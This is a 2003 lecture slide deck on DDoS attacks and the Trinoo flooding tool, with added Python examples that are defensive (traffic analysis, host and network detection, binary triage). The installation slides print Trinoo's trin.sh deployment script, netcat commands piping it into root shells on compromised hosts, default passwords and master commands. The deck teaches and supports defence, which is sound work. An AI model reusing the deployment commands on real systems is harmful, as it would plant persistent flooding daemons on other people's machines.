An Introduction to DDoS And the “Trinoo” Attack Tool Prepared by Ray Lam, Ivan Wong July 10, 2003


Page 2

Outline

Background on DDoS
  - Attack mechanism
  - Ways to defend

The attack tool – Trinoo
  - Introduction
  - Attack scenario
  - Symptoms and defense
  - Weaknesses and next evolution

Page 3

Background on DDoS

Attack mechanism

Page 4

Denial-of-Service

Flooding-based: send packets to the victim to exhaust its
  - Network resources (link bandwidth)
  - System resources (CPU, memory, connection state)

Traditional DoS: one attacker
Distributed DoS: countless attackers

Page 5

Attack Mechanism

Direct attack (A = attacker or agent, V = victim, R = the host whose address is spoofed):
  A -> V: TCP SYN, ICMP, UDP ... with R's address as the source IP address
  V -> R: TCP SYN-ACK, TCP RST, ICMP, UDP ... (the replies go to R, not back to A)

Reflector attack (R = reflector, an uncompromised host that answers whatever it is sent):
  A -> R: TCP SYN, ICMP, UDP ... with V's address as the source IP address
  R -> V: TCP SYN-ACK, TCP RST, ICMP, UDP ... (V is flooded with replies from legitimate hosts)

Page 6

Attack Architecture

Direct attack: Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Victim
  The agents send TCP SYN, ICMP, UDP ... to V; the source IP addresses are usually spoofed.

Reflector attack: Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Reflectors -> Victim
  The agents send TCP SYN, ICMP, UDP ... to the reflectors with V's address as the source IP address.
  The reflectors answer V with TCP SYN-ACK, TCP RST, ICMP, UDP ...

Page 7

Attack Methods

Attack               Attack packets                               Reply packets
Smurf                ICMP echo requests to a broadcast address    ICMP echo replies
SYN flooding         TCP SYN packets                              TCP SYN-ACK packets
RST flooding         TCP packets to closed ports                  TCP RST packets
ICMP flooding        ICMP queries                                 ICMP replies
                     UDP packets to closed ports                  ICMP port unreachable
                     IP packets with low TTL                      ICMP time exceeded
DNS reply flooding   DNS queries (recursive) to DNS servers       DNS replies

In a direct attack the attack packets hit the victim; in a reflector attack the reply packets do.

Page 8

Backscatter Analysis (Moore et al.)

Measured DoS activity on the Internet by watching the unsolicited replies ("backscatter") that victims of source-spoofed floods send to unused address space:
  TCP   94+ %
  UDP   2 %
  ICMP  2 %

TCP attacks are based mainly on SYN flooding.
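The inference behind the backscatter numbers, as an added example (not part of the original slides, and not Moore et al.'s code): a telescope covering a fraction f of the IPv4 space sees about f of a victim's replies to uniformly spoofed sources, so the victim's observed reply rate scaled by 1/f estimates the attack rate. The telescope records below are constructed, not a real capture; the address ranges are documentation addresses.

```python
"""Backscatter inference in the style of Moore et al. (added example; the
records are constructed, not a real telescope capture).

A network telescope is a block of unused address space. A victim of a
source-spoofed flood answers each spoofed packet (SYN-ACK to a SYN, RST to a
packet on a closed port, ICMP port unreachable to a UDP probe ...). Spoofed
sources are spread over the whole address space, so a telescope covering a
fraction f of IPv4 sees about f of those replies. From the replies alone we
get the victim, the attack type and an estimate of the attack rate.
"""
from collections import defaultdict

TELESCOPE_FRACTION = 2 ** 24 / 2 ** 32   # a /8 telescope covers 1/256 of IPv4

# Unsolicited packet types that can only be replies to a flood.
# (A bare SYN arriving at the telescope is a scan, not backscatter.)
BACKSCATTER = {
    ("tcp", "SA"):            "SYN flooding (SYN-ACK backscatter)",
    ("tcp", "R"):             "RST backscatter (packets sent to closed ports)",
    ("icmp", "echo-reply"):   "ICMP echo flooding",
    ("icmp", "port-unreach"): "UDP flooding to closed ports",
    ("icmp", "ttl-exceeded"): "flood of low-TTL packets",
}


def constructed_capture():
    """Telescope records (t_seconds, src_ip, proto, kind). src_ip is the host
    that sent the packet into the telescope, i.e. the replying victim."""
    recs = []
    # victim 1: 300 SYN-ACKs over 60 s -> it is under a SYN flood
    recs += [(i * 0.2, "203.0.113.10", "tcp", "SA") for i in range(300)]
    # victim 2: 40 ICMP port-unreachable over 60 s -> a UDP flood
    recs += [(i * 1.5, "192.0.2.5", "icmp", "port-unreach") for i in range(40)]
    # not an attack: a scanner probing the telescope with plain SYNs
    recs += [(i * 3.0, "198.51.100.7", "tcp", "S") for i in range(20)]
    return recs


def infer_attacks(records, window_s, fraction=TELESCOPE_FRACTION, min_packets=25):
    """Group backscatter by (victim, attack type) and extrapolate the victim's
    reply rate to the whole address space: observed_pps / fraction."""
    counts = defaultdict(int)
    for _t, src, proto, kind in records:
        label = BACKSCATTER.get((proto, kind))
        if label is None:
            continue                      # scans, probes, noise
        counts[(src, label)] += 1
    attacks = {}
    for (victim, label), n in counts.items():
        if n < min_packets:
            continue                      # too few replies to call it a flood
        observed_pps = n / window_s
        attacks[victim] = {
            "type": label,
            "observed_packets": n,
            "estimated_pps": observed_pps / fraction,
        }
    return attacks


if __name__ == "__main__":
    for victim, info in infer_attacks(constructed_capture(), window_s=60.0).items():
        print(f"{victim}: {info['type']}, ~{info['estimated_pps']:.0f} pkt/s")
```

The estimate assumes uniformly random spoofed sources and one reply per attack packet; an attacker who spoofs from a narrow range, or a victim that rate-limits its replies, breaks both assumptions, which is why Moore et al. report their rates as lower bounds.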

Page 9

Background on DDoS

Ways to defend

Page 10

Strategy

Three lines of defense:
  - Attack prevention (before the attack)
  - Attack detection and filtering (during the attack)
  - Attack source traceback (during and after the attack)

Page 11

Attack prevention

  - Protect hosts from the installation of masters and agents by attackers
  - Scan hosts for symptoms of installed agents
  - Monitor network traffic for the known message exchanges among attackers, masters and agents

Page 12

Attack prevention

Inadequate and hard to deploy:
  - Don't-care users leave security holes
  - ISP and enterprise networks have no incentive

Page 13

Attack source traceback

Identify the actual origin of a packet without relying on its source IP. Two approaches:
  - Routers record information about the packets they forward (logging)
  - Routers send additional information about the packets to the destination (marking)

Page 14

Attack source traceback

  - Source traceback cannot stop an ongoing DDoS attack
  - Cannot trace origins behind firewalls or NAT (network address translators)
  - More work is needed for reflector attacks: the attack packets come from legitimate sources, so traceback stops at the reflector
  - Useful in post-attack law enforcement

Page 15

Attack detection and filtering

Detection: identify the DDoS attack and the attack packets
Filtering: classify normal and attack packets; drop the attack packets

Page 16

Attack detection and filtering

Can be done in 4 places:
  - Victim's network
  - Victim's ISP network
  - Further upstream ISP networks
  - Attack source networks

Dispersed agents send packets to a single victim, like pouring packets into the top of a funnel.

Page 17

Attack detection and filtering

[Figure: the funnel, from the attack source networks through the further upstream ISP networks and the victim's ISP network down to the victim's network. Toward the victim, the effectiveness of detection increases; toward the sources, the effectiveness of filtering increases.]

Page 18

Attack detection and filtering

Detection
  - Easy at the victim's network: large amount of attack packets
  - Difficult at an individual agent's network: small amount of attack packets

Filtering
  - Effective at the agents' networks: less likely to drop normal packets
  - Ineffective at the victim's network: more normal packets are dropped

Page 19

D&F at agent's network

  - Usually cannot detect a DDoS attack (too few packets)
  - Can filter attack packets with spoofed source addresses (ingress filtering):
      attack packets in direct attacks
      attack packets from agents to reflectors in reflector attacks
  - Ensuring that all ISPs install ingress packet filtering is impossible

Page 20

D&F at victim's network

Detect the DDoS attack
  - Unusually high volume of incoming traffic of certain packet types
  - Degraded server and network performance

Filtering is ineffective
  - Attack and normal packets have the same destination: the victim's IP and port
  - Attack packets have spoofed source IPs or come from many different IPs
  - Attack and normal packets are indistinguishable
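The two ends of the funnel on the preceding slides (ingress filtering at the agent's network, volume-based detection at the victim's network, and why filtering at the victim drops good packets), as an added example that is not part of the original slides. All packets are constructed records with a fixed random seed; the prefixes are documentation addresses and the baseline rates are assumed values.

```python
"""Detection and filtering at the two ends of the funnel (added example,
not from the original slides; every packet below is constructed).

  ingress_filter()    what the agent's network (or its access ISP) can do:
                      drop packets whose source address lies outside its own
                      prefix. That catches the spoofed packets of a direct
                      attack and of the agent->reflector leg, and nothing
                      else, so legitimate traffic is untouched.
  detect_at_victim()  what the victim's network can do: compare the packet
                      rate per (destination, protocol) with a baseline.
  collateral()        why filtering at the victim is ineffective: everything
                      matching the alert key, legitimate or not, is dropped.
"""
import ipaddress
import random
from collections import Counter

VICTIM = "203.0.113.10"
AGENT_PREFIX = ipaddress.ip_network("198.51.100.0/24")   # the agent's own network
rng = random.Random(7)                                    # fixed seed: same packets every run


def spoofed_source():
    """Random source address outside the agent's prefix (Trinoo-style
    spoofing would be uniform; we only avoid the agent's own prefix so the
    constructed sample is unambiguous)."""
    while True:
        ip = ".".join(str(rng.randrange(1, 255)) for _ in range(4))
        if ipaddress.ip_address(ip) not in AGENT_PREFIX:
            return ip


def constructed_traffic():
    """Returns (packets at the agent's network edge, packets at the victim)."""
    legit_local = [{"src": f"198.51.100.{i % 200 + 1}", "dst": "192.0.2.80",
                    "proto": "tcp", "dport": 80, "legit": True} for i in range(50)]
    attack = [{"src": spoofed_source(), "dst": VICTIM, "proto": "udp",
               "dport": rng.randrange(0, 65535), "legit": False} for _ in range(500)]
    # what also reaches the victim: real DNS queries and real web clients
    legit_dns = [{"src": f"192.0.2.{i + 1}", "dst": VICTIM, "proto": "udp",
                  "dport": 53, "legit": True} for i in range(30)]
    legit_web = [{"src": f"192.0.2.{i + 1}", "dst": VICTIM, "proto": "tcp",
                  "dport": 80, "legit": True} for i in range(100)]
    return legit_local + attack, attack + legit_dns + legit_web


def ingress_filter(packets, prefix=AGENT_PREFIX):
    """Ingress (source-address) filtering at the agent's network edge."""
    passed = [p for p in packets if ipaddress.ip_address(p["src"]) in prefix]
    dropped = [p for p in packets if ipaddress.ip_address(p["src"]) not in prefix]
    return passed, dropped


def detect_at_victim(packets, window_s, baseline_pps, factor=10):
    """Alert on (dst, proto) keys whose rate exceeds factor x the baseline for
    that protocol (a protocol with no baseline alerts on any traffic)."""
    counts = Counter((p["dst"], p["proto"]) for p in packets)
    alerts = {}
    for key, n in counts.items():
        rate = n / window_s
        if rate > factor * baseline_pps.get(key[1], 0.0):
            alerts[key] = rate
    return alerts


def collateral(packets, key):
    """Legitimate packets that a drop-everything-matching-the-key filter at
    the victim would discard along with the attack."""
    return sum(1 for p in packets if (p["dst"], p["proto"]) == key and p["legit"])


if __name__ == "__main__":
    at_agent, at_victim = constructed_traffic()
    passed, dropped = ingress_filter(at_agent)
    print(f"agent edge: passed {len(passed)}, dropped {len(dropped)} spoofed")
    alerts = detect_at_victim(at_victim, window_s=10.0,
                              baseline_pps={"udp": 2.0, "tcp": 5.0})
    for key, rate in alerts.items():
        print(f"victim: {key} at {rate:.0f} pkt/s; filtering on it would drop "
              f"{collateral(at_victim, key)} legitimate packets")
```

The detector keys on (destination, protocol) because that is all the victim can rely on: the source addresses are random and the destination ports are random. That same key is why the filter is blunt; the 30 legitimate DNS queries share it with the 500 attack packets and go down with them.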

Page 21

D&F at victim's upstream ISP

  - The victim often asks its ISP to filter the attack packets
  - Alert protocol: the victim may not be able to receive the ISP's ACK while under attack; requires strong authentication and encryption
  - Filtering is ineffective here as well; the ISP network may also be jammed

Page 22

D&F at further upstream ISP

Backpressure approach: the victim detects the DDoS attack, and the ISPs further upstream filter the attack packets.

Page 23

The attack tool – Trinoo

Introduction

Page 24

Introduction

  - Discovered in August 1999
  - Daemons found on Solaris 2.x systems
  - Used to attack a system at the University of Minnesota; the victim was unusable for 2 days

Page 25

Attack type

UDP flooding
  - Default size of a UDP packet: 1000 bytes
  - The daemon malloc()s a buffer of this size and sends its uninitialized content
  - Default attack period: 120 seconds
  - Destination port: randomly chosen from 0 – 65534

Page 26

The attack tool – Trinoo

Attack scenario

Page 27

Installation

1. Hack an account that acts as a repository for scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.

Requirements for the repository host:
  - High-bandwidth connection
  - Large number of users
  - Little administrative oversight

Page 28

Installation

2. Compromise systems
  - Look for vulnerable systems: unpatched Sun Solaris and Linux
  - Remote buffer overflow exploitation
  - Set up a root account
  - Leave a root shell listening on a TCP port (the next step connects to it)
  - Keep a "friend list" of the compromised hosts

Page 29

Installation

3. Install daemons using "netcat" ("nc") and "trin.sh"
  - netcat: network version of "cat"
  - trin.sh: shell script whose output is the list of commands that set up a daemon; it is piped into the root shell listening on each compromised host

./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &

Page 30

Installation

trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"

Each echoed line is executed by the remote root shell: copy the daemon binary from the repository under a name that looks like an RPC service, start it, and install a crontab entry that relaunches it every minute so it comes back if it is killed.

Page 31

Architecture

Direct attack: Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Victim

Page 32

Communication ports

Monitor these ports to detect the presence of a master or an agent:

Attacker -> Master    TCP port 27665
Master -> Daemon      UDP port 27444
Daemon -> Master      UDP port 31335

Page 33

Password protection

  - Passwords prevent administrators or other hackers from taking control
  - The crypt()-encrypted password is compiled into the master and the daemon
  - The clear-text password is sent over the network; the session is not encrypted
  - The received password is crypt()ed and compared with the compiled-in value

Page 34

Password protection

Default passwords:
  "l44adsl"          trinoo daemon password
  "gOrave"           trinoo master server startup password
  "betaalmostdone"   trinoo master remote interface password
  "killme"           trinoo master password to control the "mdie" command

Page 35

Login to master

Telnet to port 27665 of the host running the master and enter the password "betaalmostdone". The master warns if others try to connect to it.

[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

Page 36

Master and daemon

  - Communicate by UDP packets
  - Command line format: arg1 password arg2
  - Default password is "l44adsl"
  - When a daemon starts, it sends "HELLO" to the master
  - The master maintains a list of daemons

Page 37

Master commands

dos IP                DoS the IP address specified; "aaa l44adsl IP" is sent to each daemon
mdos <ip1:ip2:ip3>    DoS the IPs simultaneously
mtimer N              Set the attack period to N seconds

Page 38

Master commands

bcast                 List all daemons' IPs
mdie password         Shut down all daemons
killdead              Ask all daemons to send "HELLO" to the master; delete all dead daemons from the list

Page 39

Daemon commands

  - Not used directly by the attacker; only the master sends them to the daemons
  - Consist of 3 letters, so that the Unix command "strings" (which by default shows runs of 4 or more characters) does not expose them in the binary

Page 40

Daemon commands

aaa password IP       DoS the specified IP
bbb password N        Set the attack period to N seconds
rsz password N        Set the attack packet size to N bytes

Page 41

The attack tool – Trinoo

Symptoms and defense

Page 42

Symptoms

Masters

Crontab entry (relaunches the binary every minute):
* * * * * /usr/sbin/rpc.listen

Friend list: the files "..." and "...-b" in the master's directory
# ls -l ... ...-b
-rw-------   1 root     root           25 Sep 26 14:46 ...
-rw-------   1 root     root           50 Sep 26 14:30 ...-b

Page 43

Symptoms

Masters (cont'd): socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
. . .
udp        0      0 *:31335                 *:*
. . .

Page 44

Symptoms

Masters (cont'd): file status

# lsof | egrep ":31335|:27665"
master   1292  root  3u  inet  2460  UDP *:31335
master   1292  root  4u  inet  2461  TCP *:27665 (LISTEN)

# lsof -p 1292
COMMAND  PID   USER  FD   TYPE  DEVICE  SIZE    NODE   NAME
master   1292  root  cwd  DIR   3,1     1024    14356  /tmp/...
master   1292  root  rtd  DIR   3,1     1024    2      /
master   1292  root  txt  REG   3,1     30492   14357  /tmp/.../master
master   1292  root  mem  REG   3,1     342206  28976  /lib/ld-2.1.1.so
master   1292  root  mem  REG   3,1     63878   29116  /lib/libcrypt-2.1.1.so

Page 45

Symptoms

Daemons: socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
. . .
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
. . .

Page 46

Symptoms

Daemons (cont'd): file status

# lsof | egrep ":27444"
ns       1316  root  3u  inet  2502  UDP *:27444

# lsof -p 1316
COMMAND  PID   USER  FD   TYPE  DEVICE  SIZE     NODE    NAME
ns       1316  root  cwd  DIR   3,1     1024     153694  /tmp/...
ns       1316  root  rtd  DIR   3,1     1024     2       /
ns       1316  root  txt  REG   3,1     6156     153711  /tmp/.../ns
ns       1316  root  mem  REG   3,1     342206   28976   /lib/ld-2.1.1.so
ns       1316  root  mem  REG   3,1     63878    29116   /lib/libcrypt-2.1.1.so
ns       1316  root  mem  REG   3,1     4016683  29115   /lib/libc-2.1.1.so
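A host-side check that turns the symptom slides into code, as an added example (not from the slides or from Dittrich's analysis): it parses `netstat -a --inet`, `lsof` and crontab output for the three control ports and the every-minute restart entry. The sample outputs below are constructed to match the slides; on a live host you would pass the commands' real output instead (omitted so the example runs offline).

```python
"""Host check for Trinoo symptoms (added example; the sample outputs are
constructed to match the slides, not captured from a real host).

Parses the three kinds of output the symptom slides show:
  netstat -a --inet   sockets bound to the three Trinoo control ports
  lsof                which process (name, pid) owns those sockets
  crontab -l          the every-minute entry that trin.sh installs
"""
import re

# (proto, port) -> (role of the host, what the port carries); from the
# communication-ports slide
TRINOO_PORTS = {
    ("tcp", 27665): ("master", "attacker -> master control interface"),
    ("udp", 31335): ("master", "daemon -> master replies"),
    ("udp", 27444): ("daemon", "master -> daemon commands"),
}
DAEMON_PATH = "/usr/sbin/rpc.listen"   # name trin.sh gives the daemon on the slides

NETSTAT_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+\S+:(\d+)(?:\s|$)")
LSOF_RE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\S+\s+inet\s+\d+\s+(TCP|UDP)\s+\S*:(\d+)")
CRON_RE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(\S+)")   # "* * * * * <command>"


def scan_netstat(text):
    """(proto, port) pairs from netstat output that are Trinoo control ports."""
    hits = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line.strip())
        if m and (m.group(1), int(m.group(2))) in TRINOO_PORTS:
            hits.append((m.group(1), int(m.group(2))))
    return hits


def scan_lsof(text):
    """(command, pid, proto, port) for processes bound to Trinoo control ports."""
    hits = []
    for line in text.splitlines():
        m = LSOF_RE.match(line.strip())
        if m:
            key = (m.group(3).lower(), int(m.group(4)))
            if key in TRINOO_PORTS:
                hits.append((m.group(1), int(m.group(2))) + key)
    return hits


def scan_crontab(text):
    """Commands scheduled to run every minute; the daemon's restart hook is one."""
    out = []
    for line in text.splitlines():
        m = CRON_RE.match(line.strip())
        if m:
            out.append(m.group(1))
    return out


def assess(netstat_text, lsof_text="", crontab_text=""):
    roles = {TRINOO_PORTS[k][0] for k in scan_netstat(netstat_text)}
    every_minute = scan_crontab(crontab_text)
    return {
        "master": "master" in roles,
        "daemon": "daemon" in roles,
        "processes": scan_lsof(lsof_text),
        "cron_restart": [c for c in every_minute if c == DAEMON_PATH],
        "cron_every_minute": every_minute,
    }


# ---- constructed samples, shaped like the slides -----------------------------
MASTER_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:22                    *:*                     LISTEN
tcp        0      0 *:27665                 *:*                     LISTEN
udp        0      0 *:31335                 *:*
"""
MASTER_LSOF = """\
sshd      812  root  3u  inet  1022  TCP *:22 (LISTEN)
master   1292  root  3u  inet  2460  UDP *:31335
master   1292  root  4u  inet  2461  TCP *:27665 (LISTEN)
"""
DAEMON_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
"""
DAEMON_LSOF = "ns       1316  root  3u  inet  2502  UDP *:27444\n"
CRONTAB = "* * * * * /usr/sbin/rpc.listen\n0 3 * * * /usr/sbin/logrotate\n"

if __name__ == "__main__":
    print(assess(MASTER_NETSTAT, MASTER_LSOF, CRONTAB))
    print(assess(DAEMON_NETSTAT, DAEMON_LSOF))
```

The port numbers are compile-time constants, so a recompiled Trinoo can move them; the process running out of `/tmp/...` and the every-minute cron entry are the signals that survive a port change, which is why `assess()` reports them separately rather than folding everything into one verdict.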

Page 47

Defenses

Prevent root-level compromise
  - Patch systems
  - Set up firewalls
  - Monitor traffic

Block the abused ports (high-numbered UDP ports)
  - Trade-off: this also blocks normal programs that use the same ports

Page 48

The attack tool – Trinoo

Weaknesses and next evolution

Page 49

Weaknesses

Single kind of attack (UDP flooding): easily defended by a single defense tool

Targets are given as IP addresses: "moving target defense", the victim changes its IP to avoid the attack

Page 50

Weaknesses

The password, the encrypted password and the commands are visible in the binary images. Use the Unix command "strings" to obtain them:
  - strings master
  - strings -n 3 ns      (3-letter daemon commands are below the default minimum length of 4)

Check whether Trinoo has been found; crack the encrypted passwords

Page 51

Weaknesses

The password travels in plain text on the network; the daemon password is sent in almost every master-to-daemon command. Get it with "ngrep" or "tcpdump", which show the UDP payload.
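What a passive sensor sees on the control channel, as an added example (not from the slides and not the tool's own code) that covers both the master/daemon command format of the earlier slides and the plaintext-password weakness here. The packet records are constructed to the slides' formats ("aaa l44adsl IP", "bbb l44adsl N", "rsz l44adsl N", a daemon "HELLO", the attacker typing the master password over TCP 27665); they are not a real capture, and the addresses are documentation ranges.

```python
"""Passive decoder for Trinoo's control channel (added example; constructed
packets, not a capture).

Because nothing on the wire is encrypted, the same split-on-spaces the
daemon does on "cmd password arg" recovers the daemon password, the
master/daemon membership and the flood targets for whoever holds the pcap.
"""
import re

ATTACKER_TO_MASTER_TCP = 27665
DAEMON_TO_MASTER_UDP = 31335
MASTER_TO_DAEMON_UDP = 27444

DAEMON_CMDS = {          # 3-letter daemon commands from the slides
    "aaa": "dos",        # aaa password IP
    "bbb": "mtimer",     # bbb password N   (attack period, seconds)
    "rsz": "rsz",        # rsz password N   (packet size, bytes)
}
CMD_RE = re.compile(r"^([a-z]{3}) (\S+)(?: (\S+))?$")   # cmd password [arg]


def decode(pkt):
    """pkt = (proto, src, sport, dst, dport, payload_bytes). Returns a dict
    describing the Trinoo event, or None for unrelated traffic."""
    proto, src, sport, dst, dport, payload = pkt
    text = payload.decode("ascii", "replace").strip()
    if proto == "udp" and dport == MASTER_TO_DAEMON_UDP:
        m = CMD_RE.match(text)
        if m and m.group(1) in DAEMON_CMDS:
            return {"leg": "master->daemon", "master": src, "daemon": dst,
                    "cmd": DAEMON_CMDS[m.group(1)], "password": m.group(2),
                    "arg": m.group(3)}
    elif proto == "udp" and dport == DAEMON_TO_MASTER_UDP and "HELLO" in text:
        return {"leg": "daemon->master", "daemon": src, "master": dst}
    elif proto == "tcp" and dport == ATTACKER_TO_MASTER_TCP and text:
        # the first line the attacker types is the remote-interface password
        return {"leg": "attacker->master", "attacker": src, "master": dst, "line": text}
    return None


def summarize(packets):
    """Everything an investigator wants from one capture, in one pass."""
    out = {"masters": set(), "daemons": set(), "attackers": set(),
           "daemon_passwords": set(), "master_session_lines": [],
           "targets": set(), "settings": {}}
    for pkt in packets:
        ev = decode(pkt)
        if ev is None:
            continue
        if ev["leg"] == "master->daemon":
            out["masters"].add(ev["master"])
            out["daemons"].add(ev["daemon"])
            out["daemon_passwords"].add(ev["password"])
            if ev["cmd"] == "dos":
                out["targets"].add(ev["arg"])
            elif ev["arg"] and ev["arg"].isdigit():
                out["settings"][ev["cmd"]] = int(ev["arg"])
        elif ev["leg"] == "daemon->master":
            out["daemons"].add(ev["daemon"])
            out["masters"].add(ev["master"])
        else:
            out["attackers"].add(ev["attacker"])
            out["masters"].add(ev["master"])
            out["master_session_lines"].append(ev["line"])
    return out


# Constructed capture: master 192.0.2.200, daemon 192.0.2.17, attacker
# 198.51.100.5, victim 203.0.113.10. One record per packet.
CAPTURE = [
    ("udp", "192.0.2.17", 1024, "192.0.2.200", 31335, b"HELLO"),
    ("tcp", "198.51.100.5", 40123, "192.0.2.200", 27665, b"betaalmostdone\r\n"),
    ("tcp", "198.51.100.5", 40123, "192.0.2.200", 27665, b"dos 203.0.113.10\r\n"),
    ("udp", "192.0.2.200", 1025, "192.0.2.17", 27444, b"bbb l44adsl 120"),
    ("udp", "192.0.2.200", 1025, "192.0.2.17", 27444, b"rsz l44adsl 1000"),
    ("udp", "192.0.2.200", 1025, "192.0.2.17", 27444, b"aaa l44adsl 203.0.113.10"),
    ("udp", "198.51.100.77", 5353, "198.51.100.1", 53, b"\x12\x34\x01\x00"),  # unrelated DNS
    ("udp", "192.0.2.17", 1026, "203.0.113.10", 51234, b"\x00" * 64),         # the flood itself
]

if __name__ == "__main__":
    for k, v in summarize(CAPTURE).items():
        print(f"{k}: {v}")
```

The TCP leg is handled one segment per line, which is enough for a telnet session typed by hand; a real sensor would reassemble the stream first. Note that `decode()` keys on the destination port only, so the same code is what an ngrep filter like port 27444 would show you, just parsed.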

Page 52

Uproot a Trinoo network

  1. Locate a daemon and use "strings" on it to obtain the IPs of its masters
  2. Contact the sites with a master installed; those sites check the list of daemons by inspecting the file "..." or by obtaining the master login password and using the "bcast" command
  3. Get the "mdie" password and use "mdie" to shut down all daemons; repeat "mdie" periodically, since the crontab restarts the daemons
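Step 1 above and the "strings" weakness two slides back, as an added example (not from the slides): a reimplementation of the part of the Unix `strings` command the procedure relies on, run over a constructed byte blob standing in for a daemon binary, followed by the triage an investigator does on its output. The blob is made up; its addresses are documentation ranges and the crypt-looking string in it is invented, not a real Trinoo hash.

```python
"""strings-style triage of a Trinoo binary (added example; FAKE_DAEMON is a
constructed blob, not a real binary).

strings() approximates strings(1): runs of printable ASCII at least
min_len bytes long (the -n option). triage() then picks out what the
uproot procedure needs: dotted-quad master addresses compiled into the
daemon, the default passwords, the 3-letter daemon commands, and 13-byte
runs shaped like traditional crypt(3) output, which are the candidates to
hand to an offline password cracker.
"""
import re

PRINTABLE = set(range(0x20, 0x7f))            # printable ASCII
DEFAULT_PASSWORDS = {"l44adsl", "gOrave", "betaalmostdone", "killme"}
DAEMON_CMDS = {"aaa", "bbb", "rsz"}
IP_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")  # DES crypt(3): 2-char salt + 11 chars


def strings(blob, min_len=4):
    """Printable runs of at least min_len bytes, like `strings -n min_len`."""
    out, run = [], bytearray()
    for b in blob:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:                    # run that ends at EOF
        out.append(run.decode("ascii"))
    return out


def is_ipv4(s):
    return bool(IP_RE.match(s)) and all(int(o) < 256 for o in s.split("."))


def triage(blob, min_len=3):
    """min_len defaults to 3 because the daemon commands are 3 letters."""
    found = strings(blob, min_len)
    return {
        "masters": [s for s in found if is_ipv4(s)],
        "passwords": [s for s in found if s in DEFAULT_PASSWORDS],
        "commands": [s for s in found if s in DAEMON_CMDS],
        "crypt_candidates": [s for s in found if CRYPT_RE.match(s) and not is_ipv4(s)],
    }


# Constructed stand-in for a daemon binary: an ELF-like header, two
# compiled-in master addresses, the command strings, a few bytes of
# "machine code", the plain default password, a made-up crypt-shaped
# string, and the strings the install script leaves behind.
FAKE_DAEMON = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 9
    + b"192.0.2.200\x00" + b"\x00" * 3 + b"198.51.100.9\x00"
    + b"aaa\x00bbb\x00rsz\x00"
    + b"\x8b\x45\xfc"
    + b"l44adsl\x00"
    + b"Kq2w8QhT6Lx0e\x00"
    + b"HELLO\x00" + b"/usr/sbin/rpc.listen\x00"
)

if __name__ == "__main__":
    print("strings -n 4 misses the commands:", strings(FAKE_DAEMON, 4))
    print("triage with -n 3:", triage(FAKE_DAEMON))
```

The crypt candidates are only candidates: any 13 characters from the crypt alphabet match, so expect false positives on a real binary and confirm each one by cracking it (or by feeding it to crypt() with a known default password) before treating it as a recovered secret.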

Page 53

Next evolution

  - Combination of several attack types (SYN flood, UDP flood, ICMP flood ...) for a higher chance of a successful attack
  - Stronger encryption of the embedded strings and passwords
  - Encrypted communication channel
  - Communication over a protocol that is difficult to detect or block, e.g. ICMP

Page 54

References

R. K. C. Chang, "Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial," IEEE Communications Magazine, Oct. 2002

D. Dittrich, "The DoS Project's 'Trinoo' Distributed Denial of Service Attack Tool," http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999

D. Moore, G. M. Voelker, S. Savage, "Inferring Internet Denial-of-Service Activity," Proc. USENIX Security Symposium, Aug. 2001

Page 55

Open Discussion